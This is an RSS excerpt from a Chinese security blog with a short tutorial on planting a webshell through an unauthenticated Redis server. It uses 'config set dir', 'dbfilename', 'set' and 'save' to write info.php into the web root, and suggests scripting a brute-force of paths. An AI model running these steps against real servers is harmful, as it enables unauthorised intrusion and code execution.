未授权 – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Fri, 23 Aug 2019 01:27:11 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 redis 未授权 getshell /web/369.html Tue, 06 Mar 2018 09:19:00 +0000 /?p=273

开学了,文章更新会慢,见谅。
@X1r0z原文

利用 redis 获取 webshell

端口 6379

server
1.jpg
telnet 连接

redis 配置里有 dir 和 dbfilename

dir 存储路径 dbfilename 存储文件名
2.jpg
save 保存
3.jpg
写 webshell

config set dir 路径
config dbfilename 文件名
set web 内容
save
4.jpg
访问 info.php
5.jpg
另外 config set 不存在的 dir 会报错
6.jpg
可以写个脚本爆破路径

]]>